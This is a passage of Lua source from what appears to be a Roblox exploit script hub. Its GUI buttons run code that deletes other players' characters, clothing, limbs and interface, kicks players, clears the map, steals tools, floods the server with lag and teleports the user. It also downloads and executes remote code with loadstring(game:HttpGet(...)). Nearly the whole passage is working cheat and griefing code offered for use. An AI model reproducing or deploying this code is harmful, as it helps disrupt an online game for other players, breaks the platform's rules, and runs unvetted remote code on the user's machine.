local players = getPlayer(Target.Text, Players.LocalPlayer) for i, v in pairs(players) do Destroy(Players[v].Character) end end) Pantsless.MouseButton1Click:Connect(function() local players = getPlayer(Target.Text, Players.LocalPlayer) for i, v in pairs(players) do Destroy(Players[v].Character:FindFirstChildOfClass("Pants")) end end) Shirtless.MouseButton1Click:Connect(function() local players = getPlayer(Target.Text, Players.LocalPlayer) for i, v in pairs(players) do Destroy(Players[v].Character:FindFirstChildOfClass("Shirt")) end end) NoRegen.MouseButton1Click:Connect(function() local players = getPlayer(Target.Text, Players.LocalPlayer) for i, v in pairs(players) do Destroy(Players[v].Character:FindFirstChild("Health")) end end) NoAnims.MouseButton1Click:Connect(function() local players = getPlayer(Target.Text, Players.LocalPlayer) for i, v in pairs(players) do Destroy(Players[v].Character:FindFirstChildOfClass("Humanoid"):FindFirstChildOfClass("Animator")) end end) Fat.MouseButton1Click:Connect(function() local players = getPlayer(Target.Text, Players.LocalPlayer) for i, v in pairs(players) do for i, v in pairs(Players[v].Character:GetChildren()) do if v:IsA("CharacterMesh") then Destroy(v) end end end end) Goto.MouseButton1Click:Connect(function() local players = getPlayer(Target.Text, Players.LocalPlayer) for i, v in pairs(players) do Players.LocalPlayer.Character.HumanoidRootPart.CFrame = Players[v].Character.HumanoidRootPart.CFrame end end) Btools.MouseButton1Click:Connect(function() oldicon = mouse.Icon local destroytool = Instance.new("Tool", Players.LocalPlayer:FindFirstChildOfClass("Backpack")) destroytool.RequiresHandle = false destroytool.Name = "Delete" destroytool.ToolTip = "Delete Tool | Comet" destroytool.TextureId = "http://www.roblox.com/asset/?id=12223874" destroytool.CanBeDropped = false destroytool.Equipped:connect(function() equipped = true mouse.Icon = "rbxasset://textures\\HammerCursor.png" while equipped do wait() end end) destroytool.Unequipped:connect(function() equipped = false mouse.Icon = oldicon end) destroytool.Activated:connect(function() local explosion = Instance.new("Explosion", workspace) explosion.BlastPressure = 0 explosion.BlastRadius = 0 explosion.DestroyJointRadiusPercent = 0 explosion.ExplosionType = Enum.ExplosionType.NoCraters explosion.Position = mouse.Target.Position Destroy(mouse.Target) end) game:GetService("StarterGui"):SetCoreGuiEnabled('Backpack', true) Players.LocalPlayer.CharacterAdded:connect(function() local destroytool = Instance.new("Tool", Players.LocalPlayer:FindFirstChildOfClass("Backpack")) destroytool.RequiresHandle = false destroytool.Name = "Delete tool" destroytool.ToolTip = "Comet's delete tool" destroytool.TextureId = "http://www.roblox.com/asset/?id=12223874" destroytool.CanBeDropped = false destroytool.Equipped:connect(function() equipped = true mouse.Icon = "rbxasset://textures\\HammerCursor.png" while equipped do selectionbox.Adornee = mouse.Target wait() end end) destroytool.Unequipped:connect(function() equipped = false selectionbox.Adornee = nil mouse.Icon = oldmouse print(oldmouse) end) destroytool.Activated:connect(function() local explosion = Instance.new("Explosion", workspace) explosion.BlastPressure = 0 explosion.BlastRadius = 0 explosion.DestroyJointRadiusPercent = 0 explosion.ExplosionType = Enum.ExplosionType.NoCraters explosion.Position = mouse.Target.Position Destroy(mouse.Target) end) game:GetService("StarterGui"):SetCoreGuiEnabled('Backpack', true) end) end) NoLimbs.MouseButton1Click:Connect(function() local players = getPlayer(Target.Text, Players.LocalPlayer) for i, v in pairs(players) do if Players[v].Character:FindFirstChildOfClass("Humanoid").RigType == Enum.HumanoidRigType.R6 then Destroy(Players[v].Character["Left Arm"]) Destroy(Players[v].Character["Left Leg"]) Destroy(Players[v].Character["Right Arm"]) Destroy(Players[v].Character["Right Leg"]) else Destroy(Players[v].Character["LeftUpperArm"]) Destroy(Players[v].Character["LeftUpperLeg"]) Destroy(Players[v].Character["RightUpperArm"]) Destroy(Players[v].Character["RightUpperLeg"]) end end end) Bald.MouseButton1Click:Connect(function() local players = getPlayer(Target.Text, Players.LocalPlayer) for i, v in pairs(players) do for i, v in pairs(Players[v].Character:GetChildren()) do if v:IsA("Accessory") then Destroy(v) end end end end) Kick.MouseButton1Click:Connect(function() local players = getPlayer(Target.Text, Players.LocalPlayer) for i, v in pairs(players) do Destroy(Players[v]) end end) Clearmap.MouseButton1Click:Connect(function() for i,v in pairs(game:GetService("Workspace"):GetChildren()) do Destroy(v) end end) ClearGuis.MouseButton1Click:Connect(function() local players = getPlayer(Target.Text, Players.LocalPlayer) for i, v in pairs(players) do for i,d in pairs(Players[v].PlayerGui:GetChildren()) do d:Destroy() end end end) View.MouseButton1Click:Connect(function() local players = getPlayer(Target.Text, Players.LocalPlayer) for i, v in pairs(players) do game:GetService("Workspace").CurrentCamera.CameraSubject = Players[v].Character.Humanoid end end) Unview.MouseButton1Click:Connect(function() game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character:FindFirstChildWhichIsA("Humanoid") end) Stools.MouseButton1Click:Connect(function() local players = getPlayer(Target.Text, Players.LocalPlayer) for i, v in pairs(players) do Destroy(Players[v].Character:FindFirstChildOfClass("Humanoid")) repeat wait() until Players[v].Character:FindFirstChildOfClass("Humanoid").Parent == nil for _, v in ipairs(Players[v].Character:GetChildren()) do if v:IsA("BackpackItem") and v:FindFirstChild("Handle") then Players.LocalPlayer.Character:FindFirstChildOfClass("Humanoid"):EquipTool(v) end end end end) CometGUI.ResetOnSpawn = false Comet.Active = true Comet.Draggable = true Scroller.CanvasPosition = Vector2.new(0, 0) CometGUI.Parent = game:GetService("CoreGui") local Notification = loadstring(game:HttpGet("https://raw.githubusercontent.com/yofriendfromschool1/NamelessAdmin-NO-BYFRON-GUI/main/notificationtest.txt"))(); local Notify = Notification.Notify; if SupportedGame == true then Notify({ Description = "This game is supported, have fun"; Title = "Comet"; Duration = 5; }); else Notify({ Description = "This game is not supported try another game"; Title = "Comet"; Duration = 5; }); end end }) GUIS:AddButton({ Title = "Animations FE GUI 1", Description = "Animations FE GUI 1", Callback = function() local Gui = Instance.new("ScreenGui", game:GetService("CoreGui")) Gui.Name = "FE Animations" local Background = Instance.new("Frame", Gui) Background.Name = "Background" Background.Active = true Background.BackgroundColor3 = Color3.fromRGB(220, 220, 255) Background.Transparency = 0.3 Background.BorderSizePixel = 5 Background.Draggable = true Background.Position = UDim2.new(0, 300, 0, 300) Background.Size = UDim2.new(0, 345, 0, 190) local Title = Instance.new("TextLabel", Background) Title.BackgroundTransparency = 1 Title.Position = UDim2.new(0, 0, 0, -80) Title.Size = UDim2.new(0, 290, 1, 0) Title.Font = "SourceSansLight" Title.FontSize = "Size18" Title.Text = "FE Animations [by illremember]" Title.TextColor3 = Color3.fromRGB(20, 20, 25) local Chop = Instance.new("TextButton", Background) Chop.Name = "Chop" Chop.BackgroundColor3 = Color3.fromRGB(20, 20, 20) Chop.BackgroundTransparency = 0.1 Chop.BorderSizePixel = 0 Chop.Position = UDim2.new(0, 120, 0, 30) Chop.Size = UDim2.new(0, 100, 0, 30) Chop.Font = "SourceSansItalic" Chop.FontSize = "Size18" Chop.Text = "Chop" Chop.TextColor3 = Color3.fromRGB(230, 230, 230) Chop.TextWrapped = true local Dance = Chop:Clone() Dance.Name = "Dance" Dance.Parent = Background Dance.Position = UDim2.new(0, 120, 0, 70) Dance.Text = "Dance" local ArmsOut = Chop:Clone() ArmsOut.Name = "ArmsOut" ArmsOut.Parent = Background ArmsOut.Position = UDim2.new(0, 10, 0, 110) ArmsOut.Text = "ArmsOut" local Stab = Chop:Clone() Stab.Name = "Stab" Stab.Parent = Background Stab.Position = UDim2.new(0, 10, 0, 30) Stab.Text = "Stab" local SmellyRun = Chop:Clone() SmellyRun.Name = "SmellyRun" SmellyRun.Parent = Background SmellyRun.Position = UDim2.new(0, 10, 0, 70) SmellyRun.Text = "SmellyRun" local rando = Chop:Clone() rando.Name = "rando" rando.Parent = Background rando.Position = UDim2.new(0, 120, 0, 110) rando.Text = "rando" local hmm = Chop:Clone() hmm.Name = "hmm" hmm.Parent = Background hmm.Position = UDim2.new(0, 120, 0, 150) hmm.Text = "hmm" local Kick = Chop:Clone() Kick.Name = "Kick" Kick.Parent = Background Kick.Position = UDim2.new(0, 10, 0, 150) Kick.Size = UDim2.new(0, 100, 0, 30) Kick.Text = "Kick" local Flying = Chop:Clone() Flying.Name = "Flying" Flying.Parent = Background Flying.Position = UDim2.new(0, 230, 0, 30) Flying.Size = UDim2.new(0, 100, 0, 30) Flying.Text = "Flying" local Arms = Chop:Clone() Arms.Name = "Arms" Arms.Parent = Background Arms.Position = UDim2.new(0, 230, 0, 70) Arms.Size = UDim2.new(0, 100, 0, 30) Arms.Text = "Arms" local Sword = Chop:Clone() Sword.Name = "Sword" Sword.Parent = Background Sword.Position = UDim2.new(0, 230, 0, 110) Sword.Size = UDim2.new(0, 100, 0, 30) Sword.Text = "Sword" local Insane = Chop:Clone() Insane.Name = "Insane" Insane.Parent = Background Insane.Position = UDim2.new(0, 230, 0, 150) Insane.Size = UDim2.new(0, 100, 0, 30) Insane.Text = "Insane" -- local plr = game:GetService("Players").LocalPlayer local mouse = plr:GetMouse() lpc = game:GetService("Players").LocalPlayer.Character weld1 = Instance.new("Weld") Chop.MouseButton1Down:connect(function() local gg = mouse.Target if gg ~= nil then for i, v in pairs(game:GetService("Players"):GetPlayers()) do AnimationId = "33169596" local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://" .. AnimationId local k = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) k:Play() k:AdjustSpeed(1) end end end) Insane.MouseButton1Down:connect(function() local gg = mouse.Target if gg ~= nil then for i, v in pairs(game:GetService("Players"):GetPlayers()) do AnimationId = "33796059" local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://" .. AnimationId local k = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) k:Play() k:AdjustSpeed(10000) end end end) Arms.MouseButton1Down:connect(function() local gg = mouse.Target if gg ~= nil then for i, v in pairs(game:GetService("Players"):GetPlayers()) do AnimationId = "33169583" local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://" .. AnimationId local k = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) k:Play() k:AdjustSpeed(1) end end end) Sword.MouseButton1Click:connect(function() local gg = mouse.Target if gg ~= nil then for i, v in pairs(game:GetService("Players"):GetPlayers()) do AnimationId = "35978879" local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://" .. AnimationId local k = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) k:Play() k:AdjustSpeed(1) end end end) hmm.MouseButton1Down:connect(function() local gg = mouse.Target if gg ~= nil then for i, v in pairs(game:GetService("Players"):GetPlayers()) do AnimationId = "33855276" local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://" .. AnimationId local k = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) k:Play() k:AdjustSpeed(1) end end end) rando.MouseButton1Down:connect(function() local gg = mouse.Target if gg ~= nil then for i, v in pairs(game:GetService("Players"):GetPlayers()) do AnimationId = "48977286" local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://" .. AnimationId local k = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) k:Play() k:AdjustSpeed(1) end end end) Dance.MouseButton1Down:connect(function() local gg = mouse.Target if gg ~= nil then for i, v in pairs(game:GetService("Players"):GetPlayers()) do AnimationId = "35654637" local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://" .. AnimationId local k = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) k:Play() k:AdjustSpeed(1) end end end) Stab.MouseButton1Down:connect(function() local gg = mouse.Target if gg ~= nil then for i, v in pairs(game:GetService("Players"):GetPlayers()) do AnimationId = "66703241" local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://" .. AnimationId local k = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) k:Play() k:AdjustSpeed(1) end end end) Kick.MouseButton1Down:connect(function() local gg = mouse.Target if gg ~= nil then for i, v in pairs(game:GetService("Players"):GetPlayers()) do AnimationId = "45737360" local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://" .. AnimationId local k = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) k:Play() k:AdjustSpeed(1) end end end) Flying.MouseButton1Down:connect(function() local gg = mouse.Target if gg ~= nil then for i, v in pairs(game:GetService("Players"):GetPlayers()) do AnimationId = "46196309" local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://" .. AnimationId local k = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) k:Play() k:AdjustSpeed(0.001) end end end) SmellyRun.MouseButton1Down:connect(function() local gg = mouse.Target if gg ~= nil then for i, v in pairs(game:GetService("Players"):GetPlayers()) do AnimationId = "30235165" local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://" .. AnimationId local k = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) k:Play() k:AdjustSpeed(1) end end end) ArmsOut.MouseButton1Down:connect(function() local gg = mouse.Target if gg ~= nil then for i, v in pairs(game:GetService("Players"):GetPlayers()) do AnimationId = "27432691" local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://" .. AnimationId local k = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) k:Play() k:AdjustSpeed(1) end end end) end }) GUIS:AddButton({ Title = "Animations FE GUI 2", Description = "Animations FE GUI 2", Callback = function() local Gui = Instance.new("ScreenGui", game:GetService("CoreGui")) Gui.Name = "FE Animations" local Background = Instance.new("Frame", Gui) Background.Name = "Background" Background.Active = true Background.BackgroundColor3 = Color3.fromRGB(220, 190, 200) Background.Transparency = 0.3 Background.BorderSizePixel = 5 Background.Draggable = true Background.Position = UDim2.new(0, 300, 0, 300) Background.Size = UDim2.new(0, 345, 0, 190) local Title = Instance.new("TextLabel", Background) Title.BackgroundTransparency = 1 Title.Position = UDim2.new(0, 0, 0, -80) Title.Size = UDim2.new(0, 290, 1, 0) Title.Font = "SourceSansLight" Title.FontSize = "Size18" Title.Text = "FE Animations [by illremember] IMPROVED" Title.TextColor3 = Color3.fromRGB(20, 20, 25) local BarrelRoll = Instance.new("TextButton", Background) BarrelRoll.Name = "BarrelRoll" BarrelRoll.BackgroundColor3 = Color3.fromRGB(20, 20, 20) BarrelRoll.BackgroundTransparency = 0.1 BarrelRoll.BorderSizePixel = 0 BarrelRoll.Position = UDim2.new(0, 120, 0, 30) BarrelRoll.Size = UDim2.new(0, 100, 0, 30) BarrelRoll.Font = "SourceSansItalic" BarrelRoll.FontSize = "Size18" BarrelRoll.Text = "BarrelRoll" BarrelRoll.TextColor3 = Color3.fromRGB(230, 230, 230) BarrelRoll.TextWrapped = true local Dab = BarrelRoll:Clone() Dab.Name = "Dab" Dab.Parent = Background Dab.Position = UDim2.new(0, 120, 0, 70) Dab.Text = "Dab" local Crouch = BarrelRoll:Clone() Crouch.Name = "Crouch" Crouch.Parent = Background Crouch.Position = UDim2.new(0, 10, 0, 110) Crouch.Text = "Crouch" local Scream = BarrelRoll:Clone() Scream.Name = "Scream" Scream.Parent = Background Scream.Position = UDim2.new(0, 10, 0, 30) Scream.Text = "Scream" local HeadOff = BarrelRoll:Clone() HeadOff.Name = "HeadOff" HeadOff.Parent = Background HeadOff.Position = UDim2.new(0, 10, 0, 70) HeadOff.Text = "HeadOff" local LayDown = BarrelRoll:Clone() LayDown.Name = "LayDown" LayDown.Parent = Background LayDown.Position = UDim2.new(0, 120, 0, 110) LayDown.Text = "LayDown" local hmm2 = BarrelRoll:Clone() hmm2.Name = "hmm2" hmm2.Parent = Background hmm2.Position = UDim2.new(0, 120, 0, 150) hmm2.Text = "hmm2" local HeadTHROW = BarrelRoll:Clone() HeadTHROW.Name = "HeadTHROW" HeadTHROW.Parent = Background HeadTHROW.Position = UDim2.new(0, 10, 0, 150) HeadTHROW.Size = UDim2.new(0, 100, 0, 30) HeadTHROW.Text = "HeadTHROW" local Scared = BarrelRoll:Clone() Scared.Name = "Scared" Scared.Parent = Background Scared.Position = UDim2.new(0, 230, 0, 30) Scared.Size = UDim2.new(0, 100, 0, 30) Scared.Text = "Scared" local WARNING = BarrelRoll:Clone() WARNING.Name = "WARNING" WARNING.Parent = Background WARNING.Position = UDim2.new(0, 230, 0, 70) WARNING.Size = UDim2.new(0, 100, 0, 30) WARNING.Text = "WARNING" local LoopHead = BarrelRoll:Clone() LoopHead.Name = "LoopHead" LoopHead.Parent = Background LoopHead.Position = UDim2.new(0, 230, 0, 110) LoopHead.Size = UDim2.new(0, 100, 0, 30) LoopHead.Text = "LoopHead" local armturbine = BarrelRoll:Clone() armturbine.Name = "armturbine" armturbine.Parent = Background armturbine.Position = UDim2.new(0, 230, 0, 150) armturbine.Size = UDim2.new(0, 100, 0, 30) armturbine.Text = "armturbine" -- local plr = game:GetService("Players").LocalPlayer local mouse = plr:GetMouse() lpc = game:GetService("Players").LocalPlayer.Character weld1 = Instance.new("Weld") BarrelRoll.MouseButton1Down:connect(function() local gg = mouse.Target if gg ~= nil then for i, v in pairs(game:GetService("Players"):GetPlayers()) do AnimationId = "136801964" local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://" .. AnimationId local k = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) k:Play() k:AdjustSpeed(1) end end end) armturbine.MouseButton1Down:connect(function() local gg = mouse.Target if gg ~= nil then for i, v in pairs(game:GetService("Players"):GetPlayers()) do AnimationId = "259438880" local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://" .. AnimationId local k = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) k:Play() k:AdjustSpeed(100) end end end) LoopHead.MouseButton1Click:connect(function() local gg = mouse.Target if gg ~= nil then for i, v in pairs(game:GetService("Players"):GetPlayers()) do AnimationId = "35154961" local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://" .. AnimationId local k = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) while wait(0.00703125) do k:Play() k:AdjustSpeed(640) end end end end) hmm2.MouseButton1Down:connect(function() local gg = mouse.Target if gg ~= nil then for i, v in pairs(game:GetService("Players"):GetPlayers()) do AnimationId = "148840371" local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://" .. AnimationId local k = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) k:Play() k:AdjustSpeed(1) end end end) LayDown.MouseButton1Down:connect(function() local gg = mouse.Target if gg ~= nil then for i, v in pairs(game:GetService("Players"):GetPlayers()) do AnimationId = "282574440" local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://" .. AnimationId local k = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) k:Play() k:AdjustSpeed(1) end end end) Dab.MouseButton1Down:connect(function() local gg = mouse.Target if gg ~= nil then for i, v in pairs(game:GetService("Players"):GetPlayers()) do AnimationId = "248263260" local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://" .. AnimationId local k = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) k:Play() k:AdjustSpeed(1) end end end) Scream.MouseButton1Down:connect(function() local gg = mouse.Target if gg ~= nil then for i, v in pairs(game:GetService("Players"):GetPlayers()) do AnimationId = "180611870" local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://" .. AnimationId local k = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) k:Play() k:AdjustSpeed(1) end end end) HeadTHROW.MouseButton1Down:connect(function() local gg = mouse.Target if gg ~= nil then for i, v in pairs(game:GetService("Players"):GetPlayers()) do AnimationId = "35154961" local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://" .. AnimationId local k = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) k:Play() k:AdjustSpeed(1) end end end) Scared.MouseButton1Down:connect(function() local gg = mouse.Target if gg ~= nil then for i, v in pairs(game:GetService("Players"):GetPlayers()) do AnimationId = "180612465" local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://" .. AnimationId local k = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) k:Play() k:AdjustSpeed(1) end end end) HeadOff.MouseButton1Down:connect(function() local gg = mouse.Target if gg ~= nil then for i, v in pairs(game:GetService("Players"):GetPlayers()) do AnimationId = "121572214" local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://" .. AnimationId local k = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) k:Play() k:AdjustSpeed(1) end end end) Crouch.MouseButton1Down:connect(function() local gg = mouse.Target if gg ~= nil then for i, v in pairs(game:GetService("Players"):GetPlayers()) do AnimationId = "182724289" local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://" .. AnimationId local k = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) k:Play() k:AdjustSpeed(1) end end end) end }) GUIS:AddButton({ Title = "Fuzk FE GUI", Description = "Fuzk FE GUI", Callback = function() local lplayer = game:GetService('Players').LocalPlayer local killing = false function GetPlayer(String) local Found = {} local strl = String:lower() if strl == "all" then for i, v in pairs(game:GetService("Players"):GetPlayers()) do table.insert(Found, v) end elseif strl == "others" then for i, v in pairs(game:GetService("Players"):GetPlayers()) do if v.Name ~= lplayer.Name then table.insert(Found, v) end end elseif strl == "me" then for i, v in pairs(game:GetService("Players"):GetPlayers()) do if v.Name == lplayer.Name then table.insert(Found, v) end end else for i, v in pairs(game:GetService("Players"):GetPlayers()) do if v.Name:lower():sub(1, #String) == String:lower() then table.insert(Found, v) end end end return Found end function ahh(thing) local asd = { 'kill', 'gui', 'kill gui' } local f = string.upper(asd[math.random(1, #asd)]) return f end ScreenGui = Instance.new("ScreenGui") MainGui = Instance.new("Frame") TextLabel = Instance.new("TextLabel") TextLabel_2 = Instance.new("TextLabel") main = Instance.new("Frame") Invis = Instance.new("TextButton") Lag = Instance.new("TextButton") Unchor = Instance.new("TextButton") oof = Instance.new("TextButton") Bringall = Instance.new("TextButton") PunishAll = Instance.new("TextButton") Page2Button = Instance.new("TextButton") Page2 = Instance.new("Frame") Goto = Instance.new("TextButton") View = Instance.new("TextButton") Noview = Instance.new("TextButton") Fling = Instance.new("TextButton") nofling = Instance.new("TextButton") Kill = Instance.new("TextButton") Page3Button = Instance.new("TextButton") BackToPage1 = Instance.new("TextButton") Player = Instance.new("TextBox") Page3 = Instance.new("Frame") BackToPage2 = Instance.new("TextButton") TextLabel_3 = Instance.new("TextLabel") ScreenGui.Parent = game:GetService("CoreGui") MainGui.Name = "MainGui" MainGui.Parent = ScreenGui MainGui.BackgroundColor3 = Color3.new(0.580392, 0.580392, 0.580392) MainGui.BorderSizePixel = 0 MainGui.Position = UDim2.new(0.526666641, 0, 0.404052436, 0) MainGui.Size = UDim2.new(0, 447, 0, 333) MainGui.Active = true MainGui.Draggable = true TextLabel.Parent = MainGui TextLabel.BackgroundColor3 = Color3.new(0.545098, 0.545098, 0.545098) TextLabel.BorderSizePixel = 0 TextLabel.Position = UDim2.new(0, 0, 0.111164451, 0) TextLabel.Size = UDim2.new(0, 447, 0, 58) TextLabel.Font = Enum.Font.SourceSans TextLabel.FontSize = Enum.FontSize.Size32 TextLabel.Text = "Fuzk Fe Gui" TextLabel.TextColor3 = Color3.new(0, 0, 0) TextLabel.TextSize = 30 TextLabel_2.Parent = MainGui TextLabel_2.BackgroundColor3 = Color3.new(0.478431, 0.478431, 0.478431) TextLabel_2.BorderSizePixel = 0 TextLabel_2.Size = UDim2.new(0, 447, 0, 38) TextLabel_2.Font = Enum.Font.SourceSans TextLabel_2.FontSize = Enum.FontSize.Size14 TextLabel_2.Text = "" TextLabel_2.TextColor3 = Color3.new(0, 0, 0) TextLabel_2.TextSize = 14 main.Name = "main" main.Parent = MainGui main.BackgroundColor3 = Color3.new(0.580392, 0.580392, 0.580392) main.BorderSizePixel = 0 main.Position = UDim2.new(0, 0, 0.283932239, 0) main.Size = UDim2.new(0, 446, 0, 238) Invis.Name = "Invis" Invis.Parent = main Invis.BackgroundColor3 = Color3.new(0.611765, 0.611765, 0.611765) Invis.Position = UDim2.new(0.0358042195, 0, 0.0740150958, 0) Invis.Size = UDim2.new(0, 124, 0, 44) Invis.Font = Enum.Font.SourceSansBold Invis.FontSize = Enum.FontSize.Size24 Invis.Text = "Invisible" Invis.TextColor3 = Color3.new(1, 1, 1) Invis.TextSize = 20 Invis.TextStrokeTransparency = 0 Invis.MouseButton1Down:connect(function() local player = game:GetService("Players").LocalPlayer position = player.Character.HumanoidRootPart.Position wait(0.1) player.Character:MoveTo(position + Vector3.new(0, 1000000, 0)) wait(0.1) humanoidrootpart = player.Character.HumanoidRootPart:clone() wait(0.1) player.Character.HumanoidRootPart:Destroy() humanoidrootpart.Parent = player.Character player.Character:MoveTo(position) wait() end) Lag.Name = "Lag" Lag.Parent = main Lag.BackgroundColor3 = Color3.new(0.611765, 0.611765, 0.611765) Lag.Position = UDim2.new(0.346766174, 0, 0.0740150958, 0) Lag.Size = UDim2.new(0, 124, 0, 44) Lag.Font = Enum.Font.SourceSansBold Lag.FontSize = Enum.FontSize.Size24 Lag.Text = "Lag" Lag.TextColor3 = Color3.new(1, 1, 1) Lag.TextSize = 20 Lag.TextStrokeTransparency = 0 Lag.MouseButton1Down:connect(function() local lag_strength = 100 local LocalPlayer = game:GetService("Players").LocalPlayer while game:GetService("RunService").RenderStepped:Wait() do for i = 1, lag_strength do local anim = Instance.new("Animation") anim.AnimationId = "Hackmaster12 Was Hereeee!!!" .. math.random() LocalPlayer.Character.Humanoid:LoadAnimation(anim):Play() anim:Destroy() end end end) Unchor.Name = "Unchor" Unchor.Parent = main Unchor.BackgroundColor3 = Color3.new(0.611765, 0.611765, 0.611765) Unchor.Position = UDim2.new(0.644305348, 0, 0.0740150958, 0) Unchor.Size = UDim2.new(0, 124, 0, 44) Unchor.Font = Enum.Font.SourceSansBold Unchor.FontSize = Enum.FontSize.Size24 Unchor.Text = "Unanchored Parts Follow" Unchor.TextColor3 = Color3.new(1, 1, 1) Unchor.TextSize = 20 Unchor.TextStrokeTransparency = 0 Unchor.TextWrapped = true Unchor.MouseButton1Down:connect(function() local LocalPlayer = game:GetService("Players").LocalPlayer local unanchoredparts = {} local movers = {} for index, part in pairs(game:GetService("Workspace"):GetDescendants()) do if part:IsA("Part") and part.Anchored == false and part:IsDescendantOf(LocalPlayer.Character) == false then table.insert(unanchoredparts, part) part.Massless = true part.CanCollide = false if part:FindFirstChildOfClass("BodyPosition") ~= nil then part:FindFirstChildOfClass("BodyPosition"):Destroy() end end end for index, part in pairs(unanchoredparts) do local mover = Instance.new("BodyPosition", part) table.insert(movers, mover) mover.MaxForce = Vector3.new(math.huge, math.huge, math.huge) end repeat for index, mover in pairs(movers) do mover.Position = LocalPlayer.Character:FindFirstChild("HumanoidRootPart").CFrame:PointToWorldSpace(Vector3.new(0, 0, 5)) end wait(0.5) until LocalPlayer.Character:FindFirstChild("Humanoid").Health <= 0 for _, mover in pairs(movers) do mover:Destroy() end end) oof.Name = "oof" oof.Parent = main oof.BackgroundColor3 = Color3.new(0.611765, 0.611765, 0.611765) oof.Position = UDim2.new(0.038031321, 0, 0.316009164, 0) oof.Size = UDim2.new(0, 124, 0, 44) oof.Font = Enum.Font.SourceSansBold oof.FontSize = Enum.FontSize.Size24 oof.Text = "Oof Sound" oof.TextColor3 = Color3.new(1, 1, 1) oof.TextSize = 20 oof.TextStrokeTransparency = 0 oof.MouseButton1Down:connect(function() repeat wait() for v, i in pairs(game:GetService("Players"):GetChildren()) do i.Character.Head.Died.Playing = true end until game:GetService("Players").LocalPlayer.Character.Humanoid.Health == 0 end) Bringall.Name = "Bringall" Bringall.Parent = main Bringall.BackgroundColor3 = Color3.new(0.611765, 0.611765, 0.611765) Bringall.Position = UDim2.new(0.348993301, 0, 0.316009164, 0) Bringall.Size = UDim2.new(0, 124, 0, 44) Bringall.Font = Enum.Font.SourceSansBold Bringall.FontSize = Enum.FontSize.Size24 Bringall.Text = "Bring All" Bringall.TextColor3 = Color3.new(1, 1, 1) Bringall.TextSize = 20 Bringall.TextStrokeTransparency = 0 Bringall.MouseButton1Down:connect(function() local SpreadAmount = 1 local Spread_Amount = SpreadAmount - math.random(.0625, .1875) local toolamount = -8 * -8 / 4 + math.random(-1, 0) local LocalPlayer = game:GetService("Players").LocalPlayer local runservice = game:GetService("RunService") local characters = {} LocalPlayer.Character:FindFirstChild("Humanoid"):UnequipTools() local currentamount = #LocalPlayer.Backpack:GetChildren() LocalPlayer.Character.Archivable = true local tempchar = LocalPlayer.Character:Clone() tempchar.Parent = workspace local savepos = LocalPlayer.Character:FindFirstChild("HumanoidRootPart").CFrame local renderstepped = runservice.RenderStepped:Connect(function() game:GetService("Workspace").CurrentCamera.CameraSubject = tempchar:FindFirstChild("Humanoid") for _, tool in pairs(LocalPlayer.Backpack:GetChildren()) do if tool:IsA("Tool") then tool.Parent = LocalPlayer end end LocalPlayer.Character:ClearAllChildren() local char = Instance.new("Model", workspace) table.insert(characters, char) Instance.new("Humanoid", char) LocalPlayer.Character = char repeat runservice.RenderStepped:Wait() until LocalPlayer.Character ~= nil end) repeat runservice.RenderStepped:Wait() until #LocalPlayer:GetChildren() - 4 - currentamount >= toolamount + 1 renderstepped:Disconnect() repeat runservice.RenderStepped:Wait() until LocalPlayer.Character:FindFirstChild("HumanoidRootPart") ~= nil for _, char in pairs(characters) do char:Destroy() end for _, tool in pairs(LocalPlayer:GetChildren()) do if tool:IsA("Tool") then tool.Parent = LocalPlayer.Backpack end end LocalPlayer.Character:FindFirstChild("HumanoidRootPart").CFrame = savepos tempchar:Destroy() wait() 